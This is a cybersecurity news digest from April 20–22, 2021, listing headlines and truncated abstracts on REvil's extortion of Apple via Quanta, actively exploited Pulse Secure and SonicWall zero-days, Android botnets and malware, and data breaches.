The sophisticated mobile botnet, dubbed Pareto, is made up of nearly a million infected mobile Android devices pretending to be millions of people watching ads on smart TVs and other devices.Security Week
April 22, 2021 – Hacker
Researchers Find Additional Infrastructure Used By SolarWinds Hackers Full Text
Abstract
The sprawling SolarWinds cyberattack which came to light last December was known for its sophistication in the breadth of tactics used to infiltrate and persist in the target infrastructure, so much so that Microsoft went on to call the threat actor behind the campaign "skillful and methodic operators who follow operations security (OpSec) best practices to minimize traces, stay under the radar, and avoid detection." But new research published today shows that the threat actor carefully planned each stage of the operation to "avoid creating the type of patterns that make tracking them simple," thus deliberately making forensic analysis difficult. By analyzing telemetry data associated with previously published indicators of compromise, RiskIQ said it identified an additional set of 18 servers with high confidence that likely communicated with the targeted, secondary Cobalt Strike payloads delivered via the TEARDROP and RAINDROP malware, representing a 56% jumThe Hacker News
April 22, 2021 – Ransomware
DoJ Launches Ransomware Taskforce as Apple Hit by Extortion Attempt Full Text
Abstract
REvil group claims to have secret Macbook plans stolen from supplierInfosecurity Magazine
April 22, 2021 – Botnet
Pareto Botnet, million infected Android devices conduct fraud in the CTV ad ecosystem Full Text
Abstract
Researchers from Human Security have uncovered a huge botnet of Android devices being used to conduct fraud in the connected TV advertising ecosystem. Security researchers at Human Security (formerly White Ops) discovered a massive Android botnet,...Security Affairs
April 22, 2021 – General
It’s Easy to Become a Cyberattack Target, but a VPN Can Help Full Text
Abstract
You might think that cybercrime is more prevalent in less digitally literate countries. However, NordVPN’s Cyber Risk Index puts North American and Northern European countries at the top of the target list.Threatpost
April 22, 2021 – Malware
Attackers can hide ‘external sender’ email warnings with HTML and CSS Full Text
Abstract
The "external sender" warnings shown to email recipients by clients like Microsoft Outlook can be hidden by the sender, as demonstrated by a researcher. Turns out, all it takes for attackers to alter the "external sender" warning, or remove it altogether from emails is just a few lines of HTML and CSS code.BleepingComputer
April 22, 2021 – IOT
FIDO launches protocol to secure IoT onboarding to cloud and on-premise management platforms Full Text
Abstract
The FIDO Alliance announced the launch of FIDO Device Onboard protocol, a new, open IoT standard that will enable devices to simply and securely onboard to cloud and on-premise management platforms.Help Net Security
April 22, 2021 – General
Cost of Account Unlocks, and Password Resets Add Up Full Text
Abstract
There are many labor-intensive tasks that the IT service desk carries out on a daily basis. None as tedious and costly as resetting passwords. Modern IT service desks spend a significant amount of time both unlocking and resetting passwords for end-users. This issue has been exacerbated by the COVID-19 pandemic. Causes of account lockouts and password resets End-user password policies, such as those found in Microsoft Active Directory Domain Services (ADDS), typically define a password age . The password age is the length of time an end-user can keep their current password. While new guidance from NIST recommends against the long-held notion of forced password changes, it is still a common and required security mechanism across other compliance standards and industry certifications such as PCI and HITRUST. When the password age is reached for the user account, the user must change their account password. It is generally prompted at the next login on their workstation. This sceThe Hacker News
April 22, 2021 – Business
Security Biz Launches RDP Breach Notification Site Full Text
Abstract
Advanced Intelligence will check to see if your assets are on dark web siteInfosecurity Magazine
April 22, 2021 – Vulnerabilities
Trend Micro flaw actively exploited in the wild Full Text
Abstract
Cybersecurity firm Trend Micro revealed that a threat actor is actively exploiting a flaw, tracked as CVE-2020-24557, in its antivirus solutions to gain admin rights on Windows systems. Security solutions one again are used as attack vectors by threat...Security Affairs
April 22, 2021 – Vulnerabilities
Valve belatedly fixes Steam gaming platform RCE vulnerability Full Text
Abstract
A Steam source engine vulnerability discovered by ‘Florian’, a member of reverse engineering group Secret Club, was finally resolved last weekend, after it was first reported in May 2019.The Daily Swig
April 22, 2021 – Criminals
Cybercriminals Using Telegram Messenger to Control ToxicEye Malware Full Text
Abstract
Adversaries are increasingly abusing Telegram as a "command-and-control" system to distribute malware into organizations that could then be used to capture sensitive information from targeted systems. "Even when Telegram is not installed or being used, the system allows hackers to send malicious commands and operations remotely via the instant messaging app," said researchers from cybersecurity firm Check Point , who have identified no fewer than 130 attacks over the past three months that make use of a new multi-functional remote access trojan (RAT) called "ToxicEye." The use of Telegram for facilitating malicious activities is not new. In September 2019, an information stealer dubbed Masad Stealer was found to plunder information and cryptocurrency wallet data from infected computers using Telegram as an exfiltration channel. Then last year, Magecart groups embraced the same tactic to send stolen payment details from compromised websites back toThe Hacker News
April 22, 2021 – Botnet
Prometei Botnet Exploits Exchange Server Bugs to Grow Full Text
Abstract
Crypto-mining botnet has been around since 2016Infosecurity Magazine
April 22, 2021 – Ransomware
Million-dollar deposits and friends in high places: how we applied for a job with a ransomware gang Full Text
Abstract
During an undercover interview, a CyberNews researcher tricked ransomware operators affiliated with Ragnar Locker into revealing their ransom payout structure, cash out schemes, and target acquisition strategies. From a relatively rare threat just...Security Affairs
April 22, 2021 – Malware
Another Malware Made its Way in Google Play Store Full Text
Abstract
A new set of malicious Android apps out there are impersonating security scanner apps on the official Play Store to steal sensitive information or even take full control of users' devices.Cyware Alerts - Hacker News
April 22, 2021 – Ransomware
New US Justice Department Task Force Formed to Disrupt Ransomware Operations Full Text
Abstract
In an internal memo, the DoJ outlines the creation of a new initiative that will bring together current efforts in the federal government to "pursue and disrupt" ransomware operations.ZDNet
April 21, 2021 – Malware
Novel Email-Based Campaign Targets Bloomberg Clients with RATs Full Text
Abstract
Attacks dubbed ‘Fajan’ by researchers are specifically targeted and appear to be testing various threat techniques to find ones with the greatest impact.Threatpost
April 21, 2021 – Malware
Facebook Busts Palestinian Hackers’ Operation Spreading Mobile Spyware Full Text
Abstract
Facebook on Wednesday said it took steps to dismantle malicious activities perpetrated by two state-sponsored hacking groups operating out of Palestine that abused its platform to distribute malware. The social media giant attributed the attacks to a network connected to the Preventive Security Service ( PSS ), the security apparatus of the State of Palestine, and another threat actor known as Arid Viper (aka Desert Falcon and APT-C-23), the latter of which is alleged to be connected to the cyber arm of Hamas. The two digital espionage campaigns, active in 2019 and 2020, exploited a range of devices and platforms, such as Android, iOS, and Windows, with the PSS cluster primarily targeting domestic audiences in Palestine. The other set of attacks went after users in the Palestinian territories and Syria and, to a lesser extent Turkey, Iraq, Lebanon, and Libya. Both the groups appear to have leveraged the platform as a springboard to launch a variety of social engineering attacks inThe Hacker News
April 21, 2021 – Vulnerabilities
Signal CEO gives mobile-hacking firm a taste of being hacked Full Text
Abstract
Software developed by data extraction company Cellebrite contains vulnerabilities that allow arbitrary code execution on the device, claims Moxie Marlinspike, the creator of the encrypted messaging app Signal.BleepingComputer
April 21, 2021 – General
Hillicon Valley: Tech companies duke it out at Senate hearing | Seven House Republicans vow to reject donations from Big Tech Full Text
Abstract
It was a big day for Big Tech at the Capitol, with the Senate Judiciary antitrust subcommittee holding a hearing featuring Google and Apple executives to look at their app store market power. And a group of seven House Republicans pledged to reject donations from some of the top tech companies. Meanwhile, Senate Majority Leader Chuck SchumerChuck SchumerLawmakers react to guilty verdict in Chauvin murder trial: 'Our work is far from done' Overnight Health Care: Johnson & Johnson pause seen as 'responsible' in poll | Women turning out more than men for COVID-19 vaccines 'Real Housewives of the GOP' — Wannabe reality show narcissists commandeer the party MORE led a bipartisan group of lawmakers in rolling out legislation to invest more than $100 billion in emerging technologies.The Hill
April 21, 2021 – Vulnerabilities
When unicorns trot too fast: Lessons from one startup’s bug bounty missteps Full Text
Abstract
Luta Security’s Katie Moussoris details Clubhouse vulnerabilities she disclosed, and how fast growing startups with good intentions sometimes drop the ball.SCMagazine
April 21, 2021 – Education
New certification program trains cyber pros in cloud, IoT and other emerging tech Full Text
Abstract
Training covers the cloud, IoT, AI and blockchain technology, and the cybersecurity implications of each.SCMagazine
April 21, 2021 – Malware
WhatsApp Pink malware spreads via group chat messages Full Text
Abstract
A WhatsApp malware dubbed WhatsApp Pink is able to automatically reply to victims' Signal, Telegram, Viber, and Skype messages. A WhatsApp malware dubbed WhatsApp Pink has now been updated, authors have implemented the ability to automatically respond...Security Affairs
April 21, 2021 – Hacker
REvil seeks to extort Apple and hits supplier with $50 million ransom Full Text
Abstract
REvil – which has been on a tear the past several weeks – wants Apple to pay an undisclosed ransom by May 1 to “buy back” 15 stolen schematics of unreleased MacBooks and gigabytes of personal data on several major Apple brands they obtained from Quanta.SCMagazine
April 21, 2021 – Hacker
Someone is using SonicWall’s email security tool to hack customers Full Text
Abstract
It’s the second time SonicWall has been hit with an attack leveraging previously unknown weaknesses in their security products this year.SCMagazine
April 21, 2021 – Government
Justice Department convenes task force to tackle wave of ransomware attacks Full Text
Abstract
The Justice Department this week convened a new task force to address the mounting ransomware cyberattacks on critical U.S. organizations, which have spiked during the COVID-19 pandemic.The Hill
April 21, 2021 – General
Stallone Classic a Password Favorite Full Text
Abstract
Boxing drama "Rocky" tops list of movie titles most often used in leaked passwordsInfosecurity Magazine
April 21, 2021 – General
We Could Use a Private-Sector-Oriented Cyber Leader Full Text
Abstract
All three of President Biden’s picks for the top cyber positions in his administration are excellent choices. It would have been better, however, if one of them had experience more rooted in the private sector.Lawfare
April 21, 2021 – General
QR Codes Offer Easy Cyberattack Avenues as Usage Spikes Full Text
Abstract
Usage is way up, but so are cyberattacks: Mobile phishing, malware, banking heists and more can come from just one wrong scan.Threatpost
April 21, 2021 – Breach
Data Breach at New England’s Largest Energy Provider Full Text
Abstract
Misconfigured data storage folders expose data of EversourceInfosecurity Magazine
April 21, 2021 – Ransomware
Massive QLocker ransomware attack uses 7zip to encrypt QNAP devices Full Text
Abstract
A massive ransomware campaign targeting QNAP devices worldwide is underway, and users are finding their files now stored in password-protected 7zip archives.BleepingComputer
April 21, 2021 – Government
Lawmakers reintroduce bill to invest billions in emerging technologies to compete with China Full Text
Abstract
Senate Majority Leader Chuck Schumer (D-N.Y.) led dozens of bipartisan House and Senate members on Wednesday in rolling out legislation that would invest over $100 billion in emerging technologies in an effort to put the U.S. on a level playing field with China.The Hill
April 21, 2021 – Malware
Linux bans University of Minnesota for committing malicious code Full Text
Abstract
Linux kernel project maintainers have imposed a ban on the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits, or patches that deliberately introduced security vulnerabilities in the official Linux project.BleepingComputer
April 21, 2021 – Vulnerabilities
Google fixes exploited Chrome zero-day dropped on Twitter last week Full Text
Abstract
Google has released Chrome 90.0.4430.85 to address an actively exploited zero-day and four other high severity security vulnerabilities impacting today's most popular web browser.BleepingComputer
April 21, 2021 – Business
TikTok Sued Over Use of Minors’ Data Full Text
Abstract
Claim filed against TikTok on behalf of millions of children in Europe and the UKInfosecurity Magazine
April 21, 2021 – Government
CISA orders federal orgs to mitigate Pulse Secure VPN bug by Friday Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a new emergency directive ordering federal agencies to mitigate an actively exploited vulnerability in Pulse Connect Secure (PCS) VPN appliances on their networks by Friday.BleepingComputer
April 21, 2021 – Government
Foreign Spies Target British Nationals With Fake Social Media Profiles Full Text
Abstract
At least 10,000 UK nationals have been approached by malicious individuals using fraudulent profiles on the professional networking site, the BBC reports, citing security agency MI5.Dark Reading
April 21, 2021 – Vulnerabilities
Pulse Secure Critical Zero-Day Security Bug Under Active Exploit Full Text
Abstract
CVE-2021-22893 allows remote code-execution (RCE) and is being used in the wild by nation-state cyberattackers to compromise VPN appliances in defense, finance and government orgs.Threatpost
April 21, 2021 – Hacker
Logins for 1.3 million Windows RDP servers collected from hacker market Full Text
Abstract
The login names and passwords for 1.3 million current and historically compromised Windows Remote Desktop servers have been leaked by UAS, the largest hacker marketplace for stolen RDP credentials.BleepingComputer
April 21, 2021 – Vulnerabilities
Google issues Chrome update patching seven security vulnerabilities Full Text
Abstract
Google released version 90.0.4430.85 of the Chrome browser for Windows, Mac, and Linux. The zero-day, which was assigned the identifier CVE-2021-21224, was described as a "type confusion in V8".ZDNet
April 21, 2021 – Ransomware
Hackers threaten to leak stolen Apple blueprints if $50 million ransom isn’t paid Full Text
Abstract
Prominent Apple supplier Quanta on Wednesday said it suffered a ransomware attack from the REvil ransomware group, which is now demanding the iPhone maker pay a ransom of $50 million to prevent leaking sensitive files on the dark web. In a post shared on its deep web "Happy Blog" portal, the threat actor said it came into possession of schematics of the U.S. company's products such as MacBooks and Apple Watch by infiltrating the network of the Taiwanese manufacturer, claiming it's making a ransom demand to Apple after Quanta expressed no interest in paying to recover the stolen blueprints. "Our team is negotiating the sale of large quantities of confidential drawings and gigabytes of personal data with several major brands," the REvil operators said. "We recommend that Apple buy back the available data by May 1." Since first detected in June 2019, REvil (aka Sodinokibi or Sodin) has emerged as one of the most prolific ransomware-as-a-servicThe Hacker News
April 21, 2021 – Business
Rapid7 Acquires Open Source Monitoring Platform Velociraptor Full Text
Abstract
The deal will allow Rapid7 to enhance its incident response capabilitiesInfosecurity Magazine
April 21, 2021 – Ransomware
REvil ransomware gang recommends that Apple buy back its data stolen in Quanta hack Full Text
Abstract
The REvil ransomware operators are attempting to blackmail Apple after they has allegedly stolen product blueprints of the IT giant from its business partner. REvil ransomware gang is attempting to extort Apple ahead of the Apple Spring Loaded...Security Affairs
April 21, 2021 – General
Swiss Army Knife for Information Security: What Is Comprehensive Protection? Full Text
Abstract
A vendor develops the series logically so that the tools do not just cover individual needs, but complement each other. For example, the concept of SearchInform is to ensure control of threats at all levels of the information network: from hardware and software to file systems and databases, from user actions on a PC to their activity on the Internet.Threatpost
April 21, 2021 – Malware
WhatsApp Pink malware can now auto-reply to your Signal, Telegram texts Full Text
Abstract
WhatsApp malware dubbed WhatsApp Pink has now been updated with advanced capabilities that let this counterfeit Android app automatically respond to your Signal, Telegram, Viber, and Skype messages. WhatsApp Pink refers to a counterfeit app that appeared this week, primarily targeting WhatsApp users in the Indian subcontinent.BleepingComputer
April 21, 2021 – Attack
Black Kingdom and Microsoft Exchange Attacks Full Text
Abstract
The patch for ProxyLogon vulnerabilities was released more than a month ago. However, one more ransomware actor succeeded in joining the list of growing numbers of new adversaries exploiting it.Cyware Alerts - Hacker News
April 21, 2021 – General
Improve Your Cyber Security Posture by Combining State of the Art Security Tools Full Text
Abstract
Today there are plenty of cybersecurity tools on the market. It is now more important than ever that the tools you decide to use work well together. If they don't, you will not get the complete picture, and you won't be able to analyze the entire system from a holistic perspective. This means that you won't be able to do the right mitigations to improve your security posture. Here are examples of two tools that work very well together and how they will help you to get a holistic view of your cybersecurity posture. Debricked - Use Open Source Securely How is Open Source a Security Risk? Open source is not a security risk per se; it's more secure than proprietary software in many ways! With the code being publicly available, it's a lot easier for the surrounding community to identify vulnerabilities, and fixes can be done quickly. What you do need to keep in mind, though, is that any vulnerabilities in open source are publicly disclosed and the public to anyoThe Hacker News
April 21, 2021 – Business
Facebook leaks strategy to numb reaction to data scraping incidents Full Text
Abstract
Facebook's long-term strategy is to desensitize users about leaked data dumps that were collected through scraping the public portion of the social network.BleepingComputer
April 21, 2021 – Ransomware
REvil Ransomware Gang Claims to Steal Confidential Designs of Apple Devices from Quanta Computer Full Text
Abstract
REvil said it is "negotiating the sale" of the trove "with several major brands" and is sitting on data describing Apple's Watch, MacBook Air, and MacBook Pro, plus the Lenovo ThinkPad Z60m.The Register
April 21, 2021 – Malware
FormBook: A Well-known Commercial Malware Learns New Tricks Full Text
Abstract
A phishing campaign is luring victims into viewing a video with details of brochures and prices for an old purchase order. The malware involved has made a comeback with a new obfuscation technique.Cyware Alerts - Hacker News
April 21, 2021 – Malware
Malvertising Operation Tag Barnakle Takes Over Unpatched Revive Servers to Show Malicious Ads Full Text
Abstract
A malvertising operation known under the codename of Tag Barnakle has breached more than 120 ad servers over the past year and inserted malicious code into legitimate ads to redirect website visitors.The Record
April 21, 2021 – APT
Japanese Law Enforcement Names Chinese Military Linked Tick APT to Hundreds of Breaches Full Text
Abstract
Japanese law enforcement believes a group of hackers linked to the Chinese military are behind a broad cyber-espionage campaign that has breached more than 200 Japanese companies since at least 2016.The Record
April 21, 2021 – Vulnerabilities
QNAP fixes critical RCE vulnerabilities in NAS devices Full Text
Abstract
QNAP Systems has patched a pair of critical security vulnerabilities that could allow unauthenticated attackers to take control of its network-attached storage (NAS) devices.The Daily Swig
April 21, 2021 – Vulnerabilities
Update Your Chrome Browser ASAP to Patch a Week Old Public Exploit Full Text
Abstract
Google on Tuesday released an update for Chrome web browser for Windows, Mac, and Linux, with a total of seven security fixes, including one flaw for which it says an exploit exists in the wild. Tracked as CVE-2021-21224 , the flaw concerns a type confusion vulnerability in V8 open-source JavaScript engine that was reported to the company by security researcher Jose Martinez on April 5 According to security researcher Lei Cao , the bug [ 1195777 ] is triggered when performing integer data type conversion, resulting in an out-of-bounds condition that could be used to achieve arbitrary memory read/write primitive. "Google is aware of reports that exploits for CVE-2021-21224 exist in the wild," Chrome's Technical Program Manager Srinivas Sista said in a blog post. The update comes after proof-of-concept (PoC) code exploiting the flaw published by a researcher named " frust " emerged on April 14 by taking advantage of the fact that the issue was addressedThe Hacker News
April 21, 2021 – IOT
UK Government Pressing Ahead with New IoT Law Amid Pandemic Smart Device Surge Full Text
Abstract
The law will impose new obligations on the manufacturers of smart devicesInfosecurity Magazine
April 21, 2021 – Vulnerabilities
3 Zero-Day in SonicWall Enterprise Email Security Appliances actively exploited Full Text
Abstract
Security vendor SonicWall has addressed three zero-day vulnerabilities affecting both its on-premises and hosted Email Security products. SonicWall is warning its customers to update their hosted and on-premises email security products to address...Security Affairs
April 21, 2021 – Business
Cape Privacy raises $20M to enable data science operations on encrypted data Full Text
Abstract
Cape Privacy, which is developing a privacy-preserving platform for collaborative data science, today announced that it closed a $20 million Series A led by Evolution Equity Partners.Venture Beat
April 21, 2021 – Attack
Codecov Supply Chain Attack May Hit Thousands: Report Full Text
Abstract
Investigators have reportedly already found hundreds of victim customersInfosecurity Magazine
April 21, 2021 – APT
China-linked APT used Pulse Secure VPN zero-day to hack US defense contractors Full Text
Abstract
At least one China-linked APT group exploited a new zero-day flaw in Pulse Secure VPN equipment to break into the networks of US defense contractors. According to coordinated reports published by FireEye and Pulse Secure, two hacking groups have...Security Affairs
April 21, 2021 – Vulnerabilities
Django Debug Toolbar tripped up by SQL injection flaw Full Text
Abstract
Users who use the Django Debug Toolbar – particularly in production environments where the potential for attack is higher are advised to update to 1.11.1, 2.2.1, or 3.2.1.The Daily Swig
April 21, 2021 – APT
Multiple APT Groups Exploit Critical Pulse Secure Zero-Day Full Text
Abstract
Customers urged to take immediate action against nation state threatInfosecurity Magazine
April 21, 2021 – Business
Mastercard Acquires Digital Identity Verification Firm Ekata for $850 Million Full Text
Abstract
Mastercard says the plan is to combine the identity verification technology and experience of Seattle-based Ekata with its own fraud prevention and digital identity programs.Security Week
April 21, 2021 – General
MI5: 10,000+ Brits Approached by Spies on Social Site Full Text
Abstract
Intelligence agency urges caution over malicious profilesInfosecurity Magazine
April 21, 2021 – Vulnerabilities
GraphQL APIs rev up innovation – but also introduce a potential security nightmare Full Text
Abstract
It should come as no surprise that businesses have glommed onto the data sharing and monetizing benefits of APIs while overlooking the security ramifications of APIs left unprotected.Last Watchdog
April 21, 2021 – IOT
FIDO Announces New Security Standard for IoT Devices Full Text
Abstract
The protocol is designed to better enable the deployment of IoT devices at scaleInfosecurity Magazine
April 21, 2021 – Malware
Updated Hancitor Malware Slings Cobalt Strike Full Text
Abstract
TA511 achieves initial access through a malicious Word document that drops an Hancitor sample as a DLL file and executes it using rundll32, a common Living Off the Land technique.Minerva Labs
April 21, 2021 – Business
Hypr raises $35M to grow its passwordless authentication platform Full Text
Abstract
Hypr, a cloud multifactor authentication platform, today announced it has raised $35 million in a series C round led by Advent International, doubling the company’s total funding to over $72 million.Venture Beat
April 20, 2021 – Policy and Law
House passes legislation to elevate cybersecurity at the State Department Full Text
Abstract
The House on Tuesday approved bipartisan legislation aimed at elevating cybersecurity at the State Department through prioritizing and reorganizing a key department on the heels of multiple major foreign cyberattacks against the United States.The Hill
April 20, 2021 – Government
With details sparse, vendors scramble to make sense of Biden 100-day grid security plan Full Text
Abstract
The plan, which encourages owners and operators of industrial control systems to “implement measures or technology that enhance their detection, mitigation, and forensic capabilities,” was not released in full to the public — or to many vendors who might be instrumental in actualizing key objectives.SCMagazine
April 20, 2021 – Vulnerabilities
3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances Full Text
Abstract
SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild. Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's Email Security (ES) application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021. FireEye is tracking the malicious activity under the moniker UNC2682. "These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device," researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said . The adversary leveraged these vulnerabilitieThe Hacker News
April 20, 2021 – Hacker
WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations Full Text
Abstract
If the Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch yet. At least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks. "A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, CVE-2021-22893 , are responsible for the initial infection vector," cybersecurity firm FireEye said on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances. The company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (&quThe Hacker News
April 20, 2021 – General
Hillicon Valley: Biden administration kicks off 100-day plan to secure the grid | Daily Mail owner files antitrust suit against Google Full Text
Abstract
The Biden administration on Tuesday kicked off a 100-day plan to secure the electric grid amid mounting threats. Meanwhile, the parent company of the Daily Mail is suing Google over allegations that it maintained a monopoly in the ads space, and Apple unveiled a new tracking product that is raising concerns.The Hill
April 20, 2021 – Breach
Dating Service Suffers Data Breach Full Text
Abstract
Cyber-attackers gain access to Manhunt’s accounts databaseInfosecurity Magazine
April 20, 2021 – Hacker
REvil gang tries to extort Apple, threatens to sell stolen blueprints Full Text
Abstract
The REvil ransomware gang asked Apple to "buy back" stolen product blueprints to avoid having them leaked on REvil's leak site before today's Apple Spring Loaded event where the new iMac was introduced.BleepingComputer
April 20, 2021 – Botnet
QBot Replaces IcedID in Malspam Campaigns Full Text
Abstract
Cybercriminals were found shuffling payloads once again. Security analysts reported two banking trojans being used alternatively to deliver various ransomware strains as the final payload in recent attacks.Cyware Alerts - Hacker News
April 20, 2021 – Breach
Multiple agencies breached by hackers using Pulse Secure vulnerabilities Full Text
Abstract
Federal authorities announced Tuesday that hackers breached multiple government agencies and other critical organizations by exploiting vulnerabilities in products from a Utah-based software company.The Hill
April 20, 2021 – Malware
Over 750,000 Users Downloaded New Billing Fraud Apps From Google Play Store Full Text
Abstract
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud. The apps in question primarily targeted users in Southwest Asia and the Arabian Peninsula, attracting a total of 700,000 downloads before they were discovered and removed from the platform. The findings were reported independently by cybersecurity firms Trend Micro and McAfee . "Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases," researchers from McAfee said in a Monday write-up. The fraudulent apps belong to the so-called " Joker " (aka Bread) malware, which has been found to repeatedly sneak past Google Play defenses over the past four years, resulting in Google removing no fewer than 1,700 infected apps from the Play Store as ofThe Hacker News
April 20, 2021 – Ransomware
School District’s Files Leaked in $40m Ransomware Attack Full Text
Abstract
Hackers leak Florida school district’s files online when their ransom demand isn’t metInfosecurity Magazine
April 20, 2021 – Government
The Cyberlaw Podcast: Cybersecurity Issues on the Congressional Agenda Full Text
Abstract
Our interview is with Mark Montgomery and John Costello, both staff to the Cyberspace Solarium Commission. The commission, which issued its main report more than a year ago, is swinging through the pitch, following up with new white papers, draft legislative language and enthusiastic advocacy fLawfare
April 20, 2021 – Hacker
Hacking a X-RAY Machine with WHIDelite & EvilCrowRF Full Text
Abstract
The popular cyber security expert Luca Bongiorni demonstrated how to hack an X-Ray Machine using his WHIDelite tool. Recently I bought a X-RAY machine from China to have some ghetto-style desktop setup in order to inspect/reverse engineer some PCBs...Security Affairs
April 20, 2021 – Hacker
Hackers exploit unpatched vulnerabilities, zero day to attack governments and contractors Full Text
Abstract
FireEye’s Mandiant team revealed ongoing exploitation of vulnerabilities in Pulse Secure VPN devices by at least two hacking groups, one of which they linked to China, to attack governments, defense contractors and other businesses in the U.S. and Europe.SCMagazine
April 20, 2021 – Vulnerabilities
Mozilla Fixes Firefox Flaw That Allowed Spoofing of HTTPS Browser Padlock Full Text
Abstract
The Mozilla Foundation releases Firefox 88, fixing 13 bugs ranging from high to low severity.Threatpost
April 20, 2021 – Vulnerabilities
SonicWall warns customers to patch 3 zero-days exploited in the wild Full Text
Abstract
Security hardware manufacturer SonicWall is urging customers to patch a set of three zero-day vulnerabilities affecting both its on-premises and hosted Email Security products.BleepingComputer
April 20, 2021 – Malware
Joker Malware Pinches 500,000 Huawei Android Users Full Text
Abstract
Roughly half a million Huawei users reportedly downloaded applications hosting the Joker malware that subscribes the victims to unwanted premium mobile services.Cyware Alerts - Hacker News
April 20, 2021 – Hacker
Threat Actor Claims to Have Hacked Domino’s Full Text
Abstract
Hacker claims to have stolen 13TBs of data from multinational pizza chain’s Indian wingInfosecurity Magazine
April 20, 2021 – Phishing
Critical update: Facebook Messenger users hit by scammers in over 80 states Full Text
Abstract
Researchers from security firm Group-IB have detected a large-scale scam campaign targeting Facebook Messenger users all over the world. Group-IB has detected a large-scale scam campaign targeting Facebook Messenger users all over the world. Group-IB Digital...Security Affairs
April 20, 2021 – Hacker
Foreign threat actors used fake LinkedIn profiles to lure 10,000 UK nationals Full Text
Abstract
The targeting shows that humans remain the weak link in any cyber and data security strategy.SCMagazine
April 20, 2021 – Breach
GEICO Alerts Customers Hackers Stole Driver License Data for Two Months Full Text
Abstract
The second-largest auto insurance provider in the U.S. has since fixed the vulnerability that exposed information from its website.Threatpost
April 20, 2021 – Breach
Eversource Energy data breach caused by unsecured cloud storage Full Text
Abstract
Eversource, the largest power supplier in New England, has suffered a data breach after customers' personal information was exposed on an unsecured cloud server.BleepingComputer
April 20, 2021 – Ransomware
New Tactics Provide Invisibility Cloak to Ransomware Attacks Full Text
Abstract
Security experts recently discovered that ransomware groups have now upgraded to newer tools and strategies to hinder and complicate forensic investigations.Cyware Alerts - Hacker News
April 20, 2021 – APT
North Korea-linked Lazarus APT hides malicious code within BMP image to avoid detection Full Text
Abstract
North Korea-linked Lazarus APT group is abusing bitmap (.BMP) image files in a recent spear-phishing campaign targeting entities in South Korea. Experts from Malwarebytes have uncovered a spear-phishing attack conducted by a North Korea-linked Lazarus...Security Affairs
April 20, 2021 – Business
Grip Security grabs more cash to lead ‘gold rush’ to cloud security development Full Text
Abstract
The Israeli-based startup, which focuses on mapping out how cloud-based software interacts with other third party applications and other vendors, raised $6 million to help tackle the increasingly urgent security problem of software supply chain compromise.SCMagazine
April 20, 2021 – Vulnerabilities
Microsoft partially fixes Windows 7, Server 2008 vulnerability Full Text
Abstract
Microsoft has silently issued a partial fix for a local privilege escalation (LPE) vulnerability impacting all Windows 7 and Server 2008 R2 devices.BleepingComputer
April 20, 2021 – Vulnerabilities
Remote code execution vulnerabilities discovered in Cosori smart air fryer Full Text
Abstract
CVE-2020-28592 and CVE-2020-28593 are remote code execution vulnerabilities that could allow an attacker to remotely inject code into the device to change temperatures, cooking times, and settings.Cisco Talos
April 20, 2021 – Phishing
Facebook Messenger Users Targeted by Scammers Across 84 Countries Full Text
Abstract
To facilitate the moderation process in Facebook and bypass its scam filters, scammers used shortened links created with the help of such services as linktr.ee, bit.ly, cutt.us, cutt.ly, and rb.gy.Group-IB
April 20, 2021 – Vulnerabilities
Vulnerability Spotlight: Multiple vulnerabilities in Synology DiskStation Manager Full Text
Abstract
An attacker could exploit CVE-2021-26560, CVE-2021-26561, and CVE-2021-26562 with a man-in-the-middle technique to gain the ability to remotely execute code on the targeted device.Cisco Talos
April 20, 2021 – Vulnerabilities
Pulse Secure VPN zero-day used to hack defense firms, govt orgs Full Text
Abstract
Pulse Secure has shared mitigation measures for a zero-day authentication bypass vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance actively exploited against US Defense Industrial base (DIB) networks and worldwide organizations.BleepingComputer
April 20, 2021 – Vulnerabilities
Recent Chromium bug used to attack Chinese WeChat users Full Text
Abstract
A Chrome vulnerability exploit published online last week has been weaponized and abused to attack WeChat users in China, a local security firm Qingteng Cloud Security reported on Friday.The Record
April 20, 2021 – Government
Biden administration kicks off 100-day plan to shore up cybersecurity of electric grid Full Text
Abstract
The Biden administration on Tuesday announced it was kicking off a 100-day plan aimed at protecting the electric grid against cyberattacks.The Hill
April 20, 2021 – Hacker
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Mandiant launched a spear-phishing attack to gain a foothold in the target enterprise network using a malicious Microsoft Office email attachment and an embedded malicious link.Security Affairs
April 20, 2021 – Breach
Geico customers’ driver’s license numbers exposed in breach Full Text
Abstract
A Geico data breach that lasted over a month earlier this year exposed customers’ driver’s license numbers to hackers, according to a notice filed with California’s attorney general earlier this month.The Hill
April 20, 2021 – Malware
Fake Microsoft Store, Spotify sites spread info-stealing malware Full Text
Abstract
Attackers are promoting sites impersonating the Microsoft Store, Spotify, and an online document converter that distribute malware to steal credit cards and passwords saved in web browsers.BleepingComputer
April 20, 2021 – Criminals
Europol Report Highlights Pandemic’s Effect on Cybercrime Full Text
Abstract
